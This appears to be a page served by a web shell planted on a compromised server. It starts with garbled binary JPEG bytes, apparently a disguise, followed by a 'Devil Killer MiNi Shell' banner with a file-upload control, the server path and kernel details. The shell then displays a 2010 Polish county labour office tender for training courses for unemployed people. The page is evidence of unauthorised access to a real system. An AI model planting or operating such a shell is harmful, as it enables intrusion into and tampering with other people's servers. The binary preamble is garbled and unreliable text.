JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100413/83241-N-2010.html

<p class="kh_header"><b>Aleksandrów Kujawski: Zamówienie publiczne w sprawie organizacji i przeprowadzenie następujących szkoleń dla osób bezrobotnych i poszukujących pracy:
Część A - szkolenie Kurs kosmetyczny, stylizacji paznokci, wizażu,
Część B - szkolenie Specjalista ds. kadr i płac z programem SYMFONIA i PŁATNIK,
Część C - szkolenie Opiekunka dziecięca,
Część D - szkolenie Spawanie blach i rur spoinami pachwinowymi metodą TIG i MAG.</b><br>
<b>Numer ogłoszenia: 83241 - 2010; data zamieszczenia: 13.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Przemysłowa 1, 87-700 Aleksandrów Kujawski, woj. kujawsko-pomorskie, tel. 054 2824696, faks 054 2824696.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zamówienie publiczne w sprawie organizacji i przeprowadzenie następujących szkoleń dla osób bezrobotnych i poszukujących pracy:
Część A - szkolenie Kurs kosmetyczny, stylizacji paznokci, wizażu,
Część B - szkolenie Specjalista ds. kadr i płac z programem SYMFONIA i PŁATNIK,
Część C - szkolenie Opiekunka dziecięca,
Część D - szkolenie Spawanie blach i rur spoinami pachwinowymi metodą TIG i MAG..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie przewiduje przeprowadzenie szkoleń:
Część A
Szkolenie: Kurs kosmetyczny, stylizacji paznokci, wizażu
1) Szkolenie winno odbywać się w miejscowości Aleksandrów Kujawski lub Ciechocinek.
2)Sugerowana tematyka szkolenia (Zamawiający dopuszcza możliwość poszerzenia proponowanych tematów szkolenia o nowe zakresy tematyczne):
- podstawy  anatomii  i  fizjologii,  
- zagadnienia  z  zakresu  dermatologii, 
- diagnostyka kosmetyczna, kosmetyki  i  ich  zastosowanie, 
-  kosmetyka  lecznicza,  estetyka, 
-  warsztat  pracy  i  narzędzia  kosmetyczki, 
-  stylizacja  kolorystyczna,  rodzaje  makijażu  i  zasady  ich  wykonywania, 
- pielęgnacja skóry twarzy, dłoni i stóp, 
- manicure i pedicure: tradycyjny, biologiczny, francuski, zdobienie paznokci, omówienie metod przedłużania paznokci.
3)Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 160 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Szkolenie winno być przeprowadzone w formie wykładów teoretycznych i ćwiczeń praktycznych.
4) Zajęcia  winny  odbywać  się  w  grupach  a  liczba  osób  w  grupie  powinna  być dostosowana  do  warunków  lokalowych  oraz   sprzętowych  posiadanych  przez   wykonawcę  i  powinna  umożliwić  uczestnikom  kursu  korzystanie  w  dostateczny sposób  z  przekazywanej  wiedzy   teoretycznej  i  praktycznej. Wykonawca zobowiązany jest do przeprowadzenia części praktycznej szkolenia w profesjonalnym, funkcjonującym gabinecie kosmetycznym, wyposażonym co najmniej w 4 stanowiska kosmetyczne do zabiegów na twarzy i ciele, 1 stanowisko do manicure i co najmniej 1 stanowisko do pedicure. 
5)  Szkoleniem objętych będzie 20 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w dwóch grupach. 12 osób skierowanych zostanie w ramach środków Projektu W DRODZE PO SUKCES Programu operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego, zaś 8 osób skierowanych zostanie w ramach środków Funduszu Pracy-PFRON. Rozpoczęcie pierwszej grupy szkolenia przewidziane jest w II kwartale bieżącego roku, natomiast szkolenie drugiej grupy rozpocznie się w III kwartale bieżącego roku. 
6) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 16:00.

Część B 
Szkolenie: Specjalista ds. kadr i płac z programem SYMFONIA i PŁATNIK 
1) Szkolenie winno odbywać się w miejscowości Aleksandrów Kujawski.
2)Szkoleniem objętych będzie 18 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w dwóch grupach. 12 osób skierowanych zostanie w ramach środków Projektu W DRODZE PO SUKCES Programu operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego, zaś 6 osób skierowanych zostanie w ramach środków Funduszu Pracy-PFRON.
3)Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 200 godzin zegarowych kursu ( gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny). Szkolenie winno być przeprowadzone w formie wykładów teoretycznych i ćwiczeń praktycznych.
4) Szkolenie prowadzone będzie w dwóch grupach. Rozpoczęcie pierwszej grupy szkolenia przewidziane jest w II kwartale bieżącego roku, natomiast szkolenie drugiej grupy rozpocznie się w III kwartale bieżącego roku. 
5) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 16:00.
Część C 
Szkolenie: Opiekunka dziecięca
1)Część teoretyczna szkolenia winna zostać przeprowadzona w miejscowości Aleksandrów Kujawski. Część praktyczna szkolenia winna zostać przeprowadzona na terenie wchodzącym w zakres właściwości miejscowej Powiatowego Urzędu Pracy w Aleksandrowie Kujawskim.
2) Minimalna ilość godzin przypadająca na każdego uczestnika szkolenia - 160 godzin zegarowych kursu (gdzie godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę, liczącą średnio 15 minut; długość przerw może być ustalana w sposób elastyczny), w tym co najmniej 70h praktyki w przedszkolu lub żłobku lub innej placówce całodziennej opieki nad dziećmi. Zajęcia praktyczne winny zostać przeprowadzone w grupach maksymalnie 3 osobowych. Tygodniowy wymiar godzinowy - co najmniej 30h na tydzień.
3) Szkoleniem objętych będzie 12 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w jednej grupie.   9 osób skierowanych zostanie w ramach środków Projektu W DRODZE PO SUKCES Programu operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego, zaś 3 osoby skierowane zostaną w ramach środków Funduszu Pracy-PFRON.
4) Realizacja szkolenia przewidziana jest w II kwartale bieżącego roku.
5) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 16:00, minimum 30 godzin zegarowych tygodniowo,

Część D 
Szkolenie: Spawanie blach i rur spoinami pachwinowymi metodą TIG i MAG

1) Szkolenie winno odbywać się w miejscowości Aleksandrów Kujawski.
2) Szkoleniem objętych będzie 30 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Aleksandrowie Kujawskim, skierowanych na szkolenie w trzech grupach  skompletowanych  przez  Zamawiającego  wg  własnych  kryteriów. 12 osób skierowanych zostanie w ramach środków Projektu W DRODZE PO SUKCES Programu operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego, zaś 18 osób skierowanych zostanie w ramach środków Funduszu Pracy/PFRON.
4) Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń Kurs spawania blach i rur spoinami pachwinowymi metoda TIG (141) w oparciu o program szkolenia zgodny z Wytycznymi Instytutu Spawalnictwa w Gliwicach oraz Kurs spawania blach i rur spoinami pachwinowymi metodą MAG (135) w oparciu o program szkolenia zgodny z Wytycznymi Instytutu Spawalnictwa w Gliwicach. Szkolenie i egzamin winny zostać przeprowadzone zgodnie z aktualnymi, obowiązującymi regulacjami prawnymi w sprawie szkolenia spawaczy. Przy przygotowaniu programu szkolenia należy powołać się na aktualne wytyczne Instytutu Spawalnictwa w Gliwicach. Szkolenie i egzamin winno zostać przeprowadzone pod merytorycznym nadzorem Instytutu Spawalnictwa w Gliwicach, zgodnie z obowiązującymi wytycznymi.
5)Szkolenie winno zakończyć się egzaminem przed uprawnioną komisją i wydaniem książeczki spawacza.
6)Minimalna ilość godzin przypadająca na jednego uczestnika szkolenia została określona w wyżej wymienionych wytycznych.
7) Realizacja pierwszej grupy szkolenia przewidziana jest w II kwartale bieżącego roku, natomiast szkolenie drugiej i trzeciej grupy rozpocznie się w III kwartale bieżącego roku. 
8)Osoby skierowane na kurs będą posiadały aktualne badania  lekarskie.
9) Zajęcia musza odbywać się od poniedziałku do piątku, pomiędzy godziną 8:00 a 16:00, minimum 30 godzin zegarowych tygodniowo,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga aktualnego dokumentu potwierdzajacego uzyskanie wpisu do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej oraz oświadczeniem o aktualizacji wpisu na 2010 rok i aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia. Wykonawcy nie spełniajacy warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga złożenia oświadczenia w trybie art. 22 ust.1 ustawy Prawo zamówień publicznych Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu oraz wykazu zrealizowanych szkoleń. Wykonawcy nie spełniający warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga złożenia oświadczenia w trybie art. 22 ust.1 ustawy Prawo zamówień publicznych Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu. Wykonawcy nie spełniający warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga złożenia oświadczenia w trybie art. 22 ust.1 ustawy Prawo zamówień publicznych Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu. Wykonawcy nie spełniający warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga złożenia oświadczenia w trybie art. 22 ust.1 ustawy Prawo zamówień publicznych Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia- nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu. Wykonawcy nie spełniający warunków zostaną przez Zamawiającego wykluczeni z udziału w postępowaniu a ich oferty zostaną odrzucone.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Parafowany wzór umowy, stanowiący załącznik nr 4 do specyfikacji istotnych warunków zamówienia (Z Wykonawcą wybranym w niniejszym postępowaniu Zamawiający zawrze umowę, której wzór stanowi załącznik nr 4 do specyfikacji);
2. Wypełniony i podpisany formularz ofertowy stanowiący załącznik nr 5 do specyfikacji istotnych warunków zamówienia;
3. Program szkolenia, uwzględniający szczegółowy podział na część praktyczną i teoretyczną;
4. Wzór zaświadczenia wydanego po ukończonym szkoleniu;
5. Oświadczenie o zapoznaniu się z warunkami Specyfikacji Istotnych Warunków Zamówienia - załącznik nr 1;
6. Zestawienie kosztów -załącznik nr 7 do SIWZ;</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja, ISO, itp.) - 10</li>
<li>3 - Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Zamawiający zastrzega sobie możliwość zmiany umowy w zakresie liczby osób skierowanych na szkolenie ( w takim przypadku Zamawiający dokona zapłaty za liczbę osób faktycznie przeszkolonych), przesunięcia terminu realizacji szkolenia, uzasadnioną zmianę miejsca organizacji szkolenia, dokonanie zmiany wykładowcy po podpisaniu umowy, pod warunkiem, że nowo wskazany wykładowca będzie posiadał wykształcenie i doświadczenie w zakresie ilości przeprowadzonych szkoleń z zakresu objętego zamówieniem równoważne do zmienianego wykładowcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-aleksandrowkujawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Aleksandrowie Kujawskim
ul. Przemysłowa 1
87 - 700 Aleksandrów Kujawski, pok.19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Aleksandrowie Kujawskim
ul. Przemysłowa 1
87 - 700 Aleksandrów Kujawski, pok.23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projektu W DRODZE PO SUKCES Programu operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs kosmetyczny, stylizacji paznokci, wizażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem tej części zamówienia jest realizacja szkolenia dla 20 osób bezrobotnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie: Specjalista ds. kadr i płac z programem SYMFONIA i PŁATNIK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja szkolenia Specjalista ds. kadr i płac z programem SYMFONIA i PŁATNIK dla 18 osób bezrobotnych i poszukujących pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Posiadanie przez Wykonawcę certyfikatu jakości usług ( np. akredytacja, ISO, itp.) - 10</li>
<li>3. Doświadczenie Wykonawcy w realizacji przedmiotowego szkolenia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> szkolenie: Opiekunka dziecięca.</p>
